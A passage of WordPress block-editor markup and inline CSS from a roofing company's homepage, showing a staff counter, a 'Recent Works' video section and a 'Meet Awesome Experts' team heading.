KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"2c42b546-5b19-4262-8165-7d9dd90f6b0c\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-2c42b546-5b19-4262-8165-7d9dd90f6b0c background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"c5ade1d9-8e73-4377-88eb-178302396f1d\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-c5ade1d9-8e73-4377-88eb-178302396f1d\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"b79f05c0-ebe5-4b26-815c-6970aa7a785d\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"8eaee92e-e616-46a2-9d4a-e683aac6ce2a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"4bf804fe-a71c-426e-8620-9384e3ade2ba\"} -->\n<style type=\"text/css\"> .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-4bf804fe-a71c-426e-8620-9384e3ade2ba skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"a230e795-4950-475e-91e7-72865fef243e\"} -->\n<style type=\"text/css\"> .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a230e795-4950-475e-91e7-72865fef243e\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7efc2986-5992-4078-a8f0-585e7384483c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7efc2986-5992-4078-a8f0-585e7384483c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\"} -->\n<style type=\"text/css\"> .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team 